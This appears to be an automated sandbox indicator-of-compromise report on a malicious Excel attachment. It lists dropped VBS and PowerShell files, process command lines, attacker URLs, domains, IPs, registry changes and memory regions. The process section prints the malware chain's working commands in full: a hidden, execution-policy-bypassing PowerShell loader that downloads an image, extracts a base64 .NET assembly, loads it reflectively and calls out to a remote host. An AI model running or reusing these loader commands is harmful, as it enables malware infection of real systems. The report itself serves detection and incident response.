IOC Report
xF3wienia PO2102559-1.xlsx

Files

File Path
Type
Category
Malicious
xF3wienia PO2102559-1.xlsx
Microsoft Excel 2007+
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\prnportjjm[1].vbs
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\prnport.vbs
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
malicious
C:\ProgramData\word.vbs
Non-ISO extended-ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\yk0CXsC5[1].txt
Unicode text, UTF-8 text, with very long lines (11670), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\2env224q.jgi.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\F0B5.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\brjdi3nn.p5i.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\eadvw4jj.1zw.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jt425jzm.yv4.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\k1albv2k.agm.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\k4b1llsj.uv2.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DFD41FACE3FBBCF23F.TMP
data
dropped
C:\Users\user\Desktop\~$xF3wienia PO2102559-1.xlsx
data
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs"
malicious

URLs

Name
IP
Malicious
http://blessy.ydns.eu/jimbo/prnportjjm.vbs
5.182.211.151
malicious
https://uploaddeimagens.com.br/images/00
unknown
malicious
https://uploaddeimagens.com.br
unknown
malicious
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
172.67.215.45
malicious
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://blessy.ydns.eu/jimbo/prnportjjm.vbsj
unknown
https://pastebin.com/Th
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://pastebin.com/raw/yk0CXsC5
172.67.19.24
https://lesferch.github.io/DesktopPic
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://blessy.ydns.eu/jimbo/prnportjjm.vbsoP
unknown
http://blessy.ydns.eu/jimbo/prnportjjm.vbsooC:
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
https://pastebin.com/Sh
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://blessy.ydns.eu/jimbo/prnportjjm.vbsD
unknown

Domains

Name
IP
Malicious
blessy.ydns.eu
5.182.211.151
malicious
uploaddeimagens.com.br
172.67.215.45
malicious
ajai.ydns.eu
23.226.132.239
pastebin.com
104.20.4.235

IPs

IP
Domain
Country
Malicious
172.67.19.24
unknown
United States
malicious
5.182.211.151
blessy.ydns.eu
Netherlands
malicious
172.67.215.45
uploaddeimagens.com.br
United States
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Path
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{-.
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28556
28556
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
k2.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2F132
2F132
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2F180
2F180
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
VBSFile
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Windows\System32\wshext.dll,-4511
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory

Memdumps

page read and write
89000
stack
page read and write
24DC000
heap
page read and write
470000
trusted library allocation
page read and write
423F000
stack
page read and write
5C0000
trusted library allocation
page read and write
30000
heap
page read and write
1FB9000
heap
page read and write
118000
heap
page read and write
1AB000
heap
page read and write
C0000
heap
page read and write
1F72000
heap
page read and write
938000
heap
page read and write
E90000
heap
page execute and read and write
44D0000
trusted library allocation
page read and write
92A000
heap
page read and write
780000
trusted library allocation
page read and write
2942000
trusted library allocation
page read and write
1F7C000
heap
page read and write
3BF000
heap
page read and write
B47000
heap
page read and write
108E000
stack
page read and write
287F000
stack
page read and write
D40000
trusted library allocation
page read and write
644000
heap
page read and write
3962000
heap
page read and write
36A6000
heap
page read and write
5E02000
heap
page read and write
4FAA000
heap
page read and write
3884000
heap
page read and write
4BA0000
heap
page read and write
75D1000
trusted library allocation
page read and write
2681000
trusted library allocation
page read and write
17B000
heap
page read and write
1CFB000
heap
page read and write
2BE000
heap
page read and write
24DC000
heap
page read and write
60D0000
heap
page read and write
10C000
heap
page read and write
4D37000
heap
page read and write
3A71000
heap
page read and write
4C1E000
stack
page read and write
26D000
heap
page read and write
3690000
trusted library allocation
page read and write
3C9000
heap
page read and write
3EB000
heap
page read and write
2CBE000
stack
page read and write
4770000
trusted library allocation
page read and write
1BA000
stack
page read and write
4CA0000
heap
page read and write
3F30000
heap
page read and write
31F0000
heap
page read and write
2E0000
trusted library allocation
page read and write
570000
heap
page read and write
230000
heap
page read and write
3E00000
heap
page read and write
3C9000
heap
page read and write
4D18000
heap
page read and write
3920000
heap
page read and write
8FD1000
trusted library allocation
page read and write
7E0000
trusted library allocation
page read and write
3F62000
heap
page read and write
3F64000
heap
page read and write
39D0000
heap
page read and write
20000
heap
page read and write
DD0000
trusted library allocation
page execute and read and write
3E09000
heap
page read and write
3AB000
heap
page read and write
1AA000
heap
page read and write
92E000
stack
page read and write
2BFB000
heap
page read and write
44A000
heap
page read and write
4FCE000
stack
page read and write
877000
heap
page read and write
11DE000
stack
page read and write
2FC0000
heap
page read and write
47B000
heap
page read and write
4CB000
heap
page read and write
3F42000
heap
page read and write
F22000
trusted library allocation
page read and write
4E7E000
stack
page read and write | page guard
32ED000
trusted library allocation
page read and write
45F000
heap
page read and write
50FB000
heap
page read and write
3E1000
heap
page read and write
1B5000
stack
page read and write
3B39000
heap
page read and write
1FE000
stack
page read and write
394000
heap
page read and write
243F000
stack
page read and write
F4B000
stack
page read and write
5D20000
heap
page read and write
3DF000
heap
page read and write
4AEE000
unkown
page read and write
4CF000
heap
page read and write
1AB000
heap
page read and write
374000
heap
page read and write
299000
heap
page read and write
1F8A000
heap
page read and write
2982000
trusted library allocation
page read and write
2A5000
trusted library allocation
page execute and read and write
7E0000
trusted library allocation
page read and write
51A0000
heap
page read and write
C5D1000
trusted library allocation
page read and write
2EA000
stack
page read and write
44D0000
heap
page read and write
2CD000
heap
page read and write
3C8F000
stack
page read and write
36CE000
stack
page read and write
1AE000
heap
page read and write
386C000
heap
page read and write
29A000
heap
page read and write
29D4000
trusted library allocation
page read and write
4E90000
heap
page read and write
1F94000
heap
page read and write
B0000
heap
page read and write
F51000
trusted library allocation
page read and write
1F8D000
heap
page read and write
3F21000
heap
page read and write
2D0000
trusted library allocation
page execute and read and write
D50000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
10000
heap
page read and write
386F000
heap
page read and write
1D0B000
heap
page read and write
3D2000
heap
page read and write
3F5F000
heap
page read and write
4D2C000
heap
page read and write
34F000
heap
page read and write
923000
heap
page read and write
945000
heap
page read and write
457F000
stack
page read and write
403D000
stack
page read and write
1F40000
direct allocation
page read and write
1FA000
trusted library allocation
page execute and read and write
26A3000
trusted library allocation
page read and write
3B4C000
stack
page read and write
8A6000
heap
page read and write
28D2000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
24B000
stack
page read and write
32B000
heap
page read and write
1F8D000
heap
page read and write
3BD000
heap
page read and write
29B1000
trusted library allocation
page read and write
750000
trusted library allocation
page execute and read and write
4770000
trusted library allocation
page read and write
3881000
heap
page read and write
213000
trusted library allocation
page execute and read and write
2160000
heap
page read and write
2B60000
trusted library allocation
page read and write
CB0000
trusted library allocation
page read and write
23E1000
heap
page read and write
4A9E000
stack
page read and write
344000
heap
page read and write
386C000
heap
page read and write
3D7000
heap
page read and write
309000
trusted library allocation
page read and write
35E000
stack
page read and write
5A3000
trusted library allocation
page read and write
FA000
heap
page read and write
11D0000
heap
page read and write
AF0000
heap
page read and write
946000
heap
page read and write
4E7F000
stack
page read and write
3681000
trusted library allocation
page read and write
3F1000
heap
page read and write
4F6D000
stack
page read and write
94B000
heap
page read and write
8DB000
heap
page read and write
4E9E000
stack
page read and write
5E3E000
stack
page read and write
2EB000
heap
page read and write
4D0E000
heap
page read and write
594000
heap
page read and write
24A000
trusted library allocation
page read and write
32F000
heap
page read and write
F8E000
stack
page read and write
3D9000
heap
page read and write
96E000
unkown
page read and write
710000
heap
page read and write
4D2C000
heap
page read and write
8EE000
stack
page read and write
47E000
heap
page read and write
F6A000
trusted library allocation
page read and write
5CEE000
stack
page read and write
4C0000
heap
page read and write
6492000
trusted library allocation
page read and write
476F000
stack
page read and write
D60000
trusted library allocation
page read and write
4CF000
heap
page read and write
299000
heap
page read and write
E30000
trusted library allocation
page read and write
E7E000
stack
page read and write
299000
heap
page read and write
47E000
heap
page read and write
4E6000
heap
page read and write
2A7000
trusted library allocation
page execute and read and write
CF0000
trusted library allocation
page read and write
4C91000
heap
page read and write
2E5000
stack
page read and write
502F000
stack
page read and write
50CE000
heap
page read and write
17B000
heap
page read and write
92A000
heap
page read and write
1FB9000
heap
page read and write
271E000
trusted library allocation
page read and write
5DFE000
stack
page read and write
CDD000
stack
page read and write
648E000
trusted library allocation
page read and write
F65000
trusted library allocation
page read and write
2B1000
heap
page read and write
29CF000
trusted library allocation
page read and write
3951000
heap
page read and write
D3D000
stack
page read and write
3DC000
heap
page read and write
3B32000
heap
page read and write
2A42000
trusted library allocation
page read and write
646000
heap
page read and write
2A9000
heap
page read and write
210000
trusted library allocation
page read and write
5C7E000
stack
page read and write
D9D1000
trusted library allocation
page read and write
389F000
stack
page read and write
3874000
heap
page read and write
41E9000
trusted library allocation
page read and write
1A8000
heap
page read and write
20000
heap
page read and write
E3D000
stack
page read and write
1F96000
heap
page read and write
3681000
trusted library allocation
page read and write
453000
heap
page read and write
1E8F000
stack
page read and write
44B000
heap
page read and write
28E9000
trusted library allocation
page read and write
1FB9000
heap
page read and write
3879000
heap
page read and write
300000
heap
page read and write
3B0D000
stack
page read and write
31A000
heap
page read and write
21D000
trusted library allocation
page execute and read and write
3B2F000
stack
page read and write
FC0000
heap
page execute and read and write
293000
heap
page read and write
220000
trusted library allocation
page read and write
4C0D000
heap
page read and write
2AF000
heap
page read and write
3689000
trusted library allocation
page read and write
C90000
trusted library allocation
page read and write
4D2E000
stack
page read and write
945000
heap
page read and write
3930000
heap
page read and write
3962000
heap
page read and write
92A000
heap
page read and write
240000
trusted library allocation
page read and write
3560000
heap
page read and write
1F0E000
stack
page read and write
478000
heap
page read and write
42D0000
heap
page read and write
10000
heap
page read and write
4D20000
heap
page read and write
636000
heap
page read and write
F00000
trusted library allocation
page execute and read and write
387000
heap
page read and write
27B000
heap
page read and write
3C9000
heap
page read and write
4C0000
heap
page read and write
3E70000
heap
page read and write
44D0000
trusted library allocation
page read and write
3B000
heap
page read and write
3560000
heap
page read and write
1020000
trusted library allocation
page read and write
3F43000
heap
page read and write
8A7000
heap
page read and write
282000
trusted library allocation
page read and write
BA0000
trusted library allocation
page read and write
299000
heap
page read and write
307000
trusted library allocation
page read and write
280F000
stack
page read and write
1DC000
stack
page read and write
447000
heap
page read and write
28E000
heap
page read and write
34F000
heap
page read and write
1AE000
heap
page read and write
50AC000
heap
page read and write
202000
trusted library allocation
page read and write
42B0000
heap
page read and write
398000
heap
page read and write
D00000
heap
page execute and read and write
D50000
trusted library allocation
page read and write
9533000
trusted library allocation
page read and write
34B000
heap
page read and write
1AA000
trusted library allocation
page read and write
7FD1000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
45F000
heap
page read and write
2923000
trusted library allocation
page read and write
4C8F000
stack
page read and write
240000
trusted library allocation
page read and write
5FEE000
stack
page read and write
3FAB000
heap
page read and write
370000
heap
page read and write
5F0E000
stack
page read and write
4D1E000
stack
page read and write
44D0000
trusted library allocation
page read and write
945000
heap
page read and write
323000
heap
page read and write
DB0000
trusted library allocation
page read and write
3E05000
heap
page read and write
20CC000
stack
page read and write
29E1000
trusted library allocation
page read and write
397E000
stack
page read and write
3939000
heap
page read and write
44D0000
trusted library allocation
page read and write
1EB000
stack
page read and write
D4F000
stack
page read and write
D90000
trusted library allocation
page read and write
2E2000
heap
page read and write
43E000
heap
page read and write
7E9000
trusted library allocation
page read and write
4F2E000
stack
page read and write
273000
heap
page read and write
3F47000
heap
page read and write
44D0000
trusted library allocation
page read and write
10000
heap
page read and write
4D13000
heap
page read and write
4BAD000
stack
page read and write
1AD000
heap
page read and write
4ED0000
heap
page read and write
193000
trusted library allocation
page execute and read and write
2D7000
stack
page read and write
890000
trusted library allocation
page read and write
113B000
stack
page read and write
2EF000
trusted library allocation
page read and write
5D0000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
5D42000
heap
page read and write
4D29000
heap
page read and write
384E000
stack
page read and write
2BB000
heap
page read and write
3C9000
heap
page read and write
648000
heap
page read and write
388F000
heap
page read and write
32F000
heap
page read and write
2900000
trusted library allocation
page read and write
4D24000
heap
page read and write
306E000
stack
page read and write
870000
trusted library allocation
page read and write
BF0000
trusted library allocation
page read and write
3F4B000
heap
page read and write
2EA0000
heap
page read and write
938000
heap
page read and write
EA0000
heap
page read and write
3670000
heap
page read and write
3FB000
heap
page read and write
3F62000
heap
page read and write
4D3D000
heap
page read and write
658000
heap
page read and write
150000
heap
page read and write
2B8000
trusted library allocation
page read and write
3BF0000
heap
page read and write
DEE000
stack
page read and write
965000
heap
page read and write
108000
heap
page read and write
39D000
heap
page read and write
8F5000
heap
page read and write
4C8C000
heap
page read and write
3233000
trusted library allocation
page read and write
266000
heap
page execute and read and write
38A2000
heap
page read and write
4D14000
heap
page read and write
4CB000
heap
page read and write
3F35000
heap
page read and write
44B000
heap
page read and write
5C0000
heap
page read and write
3234000
trusted library allocation
page read and write
4C73000
heap
page read and write
3C9000
heap
page read and write
4CF000
heap
page read and write
380000
trusted library allocation
page execute and read and write
513000
heap
page read and write
4CC000
heap
page read and write
4B4E000
stack
page read and write
60CF000
stack
page read and write
3F2F000
heap
page read and write
3CD000
heap
page read and write
639000
heap
page read and write
34F000
heap
page read and write
928000
heap
page read and write
30E000
heap
page read and write
3884000
heap
page read and write
64D000
heap
page read and write
3F37000
heap
page read and write
6E0000
trusted library allocation
page read and write